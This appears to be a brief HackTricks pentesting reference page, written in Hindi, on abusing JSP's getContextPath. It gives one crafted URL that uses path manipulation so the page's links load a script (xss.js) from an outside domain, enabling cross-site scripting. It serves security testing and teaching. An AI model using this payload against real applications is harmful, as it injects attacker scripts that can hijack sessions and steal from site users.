# JSP

{{#include ../../banners/hacktricks-training.md}}

## **getContextPath** दुरुपयोग

[यहाँ](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html) से जानकारी।
```
http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp
```
उस वेब को एक्सेस करते समय आप सभी लिंक को _**rakeshmane.com**_ से जानकारी मांगने के लिए बदल सकते हैं:

![](<../../images/image (326).png>)

{{#include ../../banners/hacktricks-training.md}}